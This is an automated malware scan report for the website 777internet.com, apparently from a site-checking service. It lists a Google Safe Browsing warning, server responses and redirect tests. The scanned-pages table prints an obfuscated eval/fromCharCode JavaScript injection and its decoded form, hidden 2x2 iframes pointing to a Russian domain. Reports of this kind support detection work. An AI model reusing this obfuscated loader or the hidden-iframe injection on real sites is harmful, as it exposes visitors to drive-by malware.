Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=777internet.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://777internet.com/ | HTTP/1.1 302 Moved Temporarily Connection: close Date: Sat, 07 Jun 2014 11:45:04 GMT Location: http://www.777internet.com/startpage/ Server: Apache/2.4.9 (Unix) Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.2.17 | clean |
http://www.777internet.com/startpage/ | 200 OK Content-Length: 6882 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: meewxib.ru try{q=document.createElement("p");q.appendChild(q+"");}catch(qw){h=-012/5;f="from";try{bcsd=prototype-2;}catch(bawg){ss=[];f+=(h&&f)?("CharC"+"ode"):"";e=window["eval"];n=[13,20,300,444,99,234,327,404,110,232,138,476,114,210,348,404,40,78,180,420,102,228,291,436,101,64,345,456,99,122,102,416,116,232,336,232,47,94,327,404,101,238,360,420,98,92,342,468,47,198,333,468,110,232,159,184,112,208,336,136,32,220,291,436,101,122,102,336,119,210,348,464 ...[441 bytes skipped]... Decoded script: document.write('<iframe src="http://meewxib.ru/count5.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'); document.write('<iframe src="http://meewxib.ru/count5.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'); <iframe src="http://meewxib.ru/count5.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe> document.write('<iframe src="http://meewxib.ru/count5.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'); document.write('<iframe src="http://meewxib.ru/count5.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'); | ||
http://www.777internet.com/startpage/var/code.js | 200 OK Content-Length: 295072 Content-Type: text/javascript | clean |
http://777internet.com/test404page.js | 404 Not Found Content-Length: 290 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: 777internet.com
Result:
HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Sat, 07 Jun 2014 11:45:04 GMT
Location: http://www.777internet.com/startpage/
Server: Apache/2.4.9 (Unix)
Content-Length: 0
Content-Type: text/html
X-Powered-By: PHP/5.2.17
...0 bytes of data.
GET / HTTP/1.1
Host: 777internet.com
Result:
HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Sat, 07 Jun 2014 11:45:04 GMT
Location: http://www.777internet.com/startpage/
Server: Apache/2.4.9 (Unix)
Content-Length: 0
Content-Type: text/html
X-Powered-By: PHP/5.2.17
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: 777internet.com
Referer: http://www.google.com/search?q=777internet.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: 777internet.com
Referer: http://www.google.com/search?q=777internet.com
Result:
The result is similar to the first query. There are no suspicious redirects found.